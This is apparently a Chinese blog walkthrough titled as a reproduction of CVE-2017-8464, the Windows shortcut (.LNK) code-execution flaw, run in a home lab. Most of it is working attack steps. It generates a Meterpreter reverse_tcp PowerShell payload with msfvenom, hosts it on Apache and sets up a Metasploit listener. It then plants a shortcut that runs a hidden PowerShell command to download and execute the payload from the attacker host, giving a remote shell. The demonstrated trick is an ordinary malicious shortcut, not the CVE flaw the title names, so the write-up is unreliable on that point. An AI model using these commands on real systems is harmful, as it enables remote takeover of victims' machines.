CVE-2017-8464远程命令执行漏洞复现

CVE-2017-8464远程命令执行漏洞复现

前言

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危

漏洞描述

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

漏洞影响范围:

● Microsoft Windows 10 Version 1607 for 32-bit Systems
● Microsoft Windows 10 Version 1607 for x64-based Systems
● Microsoft Windows 10 for 32-bit Systems
● Microsoft Windows 10 for x64-based Systems
● Microsoft Windows 10 version 1511 for 32-bit Systems
● Microsoft Windows 10 version 1511 for x64-based Systems
● Microsoft Windows 10 version 1703 for 32-bit Systems
● Microsoft Windows 10 version 1703 for x64-based Systems
● Microsoft Windows 7 for 32-bit Systems SP1
● Microsoft Windows 7 for x64-based Systems SP1
● Microsoft Windows 8.1 for 32-bit Systems
● Microsoft Windows 8.1 for x64-based Systems
● Microsoft Windows RT 8.1

服务器系统

● Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
● Microsoft Windows Server 2008 R2 for x64-based Systems SP1
● Microsoft Windows Server 2008 for 32-bit Systems SP2
● Microsoft Windows Server 2008 for Itanium-based Systems SP2
● Microsoft Windows Server 2008 for x64-based Systems SP2
● Microsoft Windows Server 2012
● Microsoft Windows Server 2012 R2
● Microsoft Windows Server 2016

漏洞复现:

利用原理:

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

环境搭建:


  • 攻击机:kalilinux;ip:192.168.1.194
  • 目标靶机:window7 32位旗舰版;IP:192.168.1.102

1、运行kalilinux;在终端中生成一个反弹shell;执行:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.194 lport=5555 -f psh-reflection>/opt/search.ps1
如果目标机是64位主机那么执行命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.194 lport=5555 -f psh-reflection>/opt/search.ps1
CVE-2017-8464远程命令执行漏洞复现_第1张图片
2、接下来查看所需要的文件是否创建成功;cd 到/opt目录下,使用ls命令查看生成的文件;
这里写图片描述
3、接下来将生成的search.ps1文件copy到/var/www/html目录下;然后将Apache服务器启动:service apache2 start
这里写图片描述
4、然后访问http://192.168.1.194/search.ps1
CVE-2017-8464远程命令执行漏洞复现_第2张图片
5、在kali终端中启动MSF工具;执行:msfconsole
这里写图片描述
6、然后再msf中以此设置参数:
msf > use exploit/multi/handler //使用工具
msf > set payload windows/meterpreter/reverse_tcp //设置payload;
如果是64位目标机 执行set payload windows/x64/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.194 //设置主机IP
msf > set lport 5555 //设置监听端口
msf > exploit //运行
CVE-2017-8464远程命令执行漏洞复现_第3张图片
7、在目标机中创建快捷键;在对象的位置中输入:powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.194/search.ps1’);test.ps1”;然后点击下一步
CVE-2017-8464远程命令执行漏洞复现_第4张图片
8、快捷名称命名为:powershell.exe;(我这里是默认的powershell.exe)
CVE-2017-8464远程命令执行漏洞复现_第5张图片
9、然后执行创建的powershell.exe快捷键;
CVE-2017-8464远程命令执行漏洞复现_第6张图片
10、在kali中msf从监听模式变成如下形式,已经获取目标机shell;执行ls命令;可见所列出的文件已经不再linux中了;而是在目标机的C盘下;
这里写图片描述
11、然后直接执行shell命令,现在就可以在终端中执行DOS命令了,然后就可以为所欲为了~~~;
CVE-2017-8464远程命令执行漏洞复现_第7张图片

你可能感兴趣的:(安全,漏洞复现,远程命令执行)